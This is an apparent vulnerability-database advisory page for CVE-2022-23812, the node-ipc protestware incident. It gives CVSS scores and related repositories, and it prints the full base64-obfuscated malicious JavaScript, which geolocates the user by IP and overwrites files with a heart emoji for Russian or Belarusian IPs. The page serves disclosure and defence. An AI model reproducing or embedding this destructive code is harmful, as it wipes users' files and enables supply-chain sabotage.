Published: 16/03/2022 Updated: 07/11/2023

CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10

CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9

VMScore: 891

Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

This affects the package node-ipc from 10.1.1 and prior to 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer.from("Li4vLi4v", "base64"); const f = Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer.from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s = JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8")); h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ?? } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };

Vulnerable Product	Search on Vulmon	Subscribe to Product
node-ipc project node-ipc

node-ipc protestware docker container test Please read my blog post node-ipc-potestware to get info about the CVE-2022-23812 This repo is a container to test how the [node-ipc] protestware code works The code has been sanitized and you can use this docker container to test it without installing anything SECURITY DISCLAIMER Please check accurately the code to see if I have omi

A script to recursively find the dependents packages of a node package.

find-node-dependents A script to recursively find the dependents packages of a node package Prints the node packageID along with the node package description Originally meant to track the node-ipc supply chain attack (CVE-2022-23812) securitysnykio/vuln/SNYK-JS-NODEIPC-2426370 githubcom/advisories/GHSA-97m3-w2cp-4xx6 I managed to run this up to a thousand

node-ipc is malware / protestware!

CVE-2022-23812 RIAEvangelist/node-ipc is malware / protestware The RIAEvangelist/node-ipc module contains protestware peacenotwar Excerpt from RIAEvangelist/node-ipc: as of v1100 & v922 this module uses the peacenotwar module More importantly, commits 847047cf7f81ab08352038b2204f0e7633449580 -> 6e344066a0464814a27fbd7ca8422f473956a803 of RIAEvangelist/n

NVD-CWE-Other https://github.com/RIAEvangelist/node-ipc/commit/847047cf7f81ab08352038b2204f0e7633449580 https://github.com/RIAEvangelist/node-ipc/issues/233 https://snyk.io/vuln/SNYK-JS-NODEIPC-2426370 https://github.com/RIAEvangelist/node-ipc/issues/236 https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js https://security.netapp.com/advisory/ntap-20220407-0005/https://nvd.nist.gov https://github.com/nicolardi/node-ipc-protestware-post.mortem https://github.com/bernardgut/find-node-dependents

CVE-2022-23812

Vulnerability Summary

Vulnerability Trend

Github Repositories

References

Vulmon Search

About

Products

Connect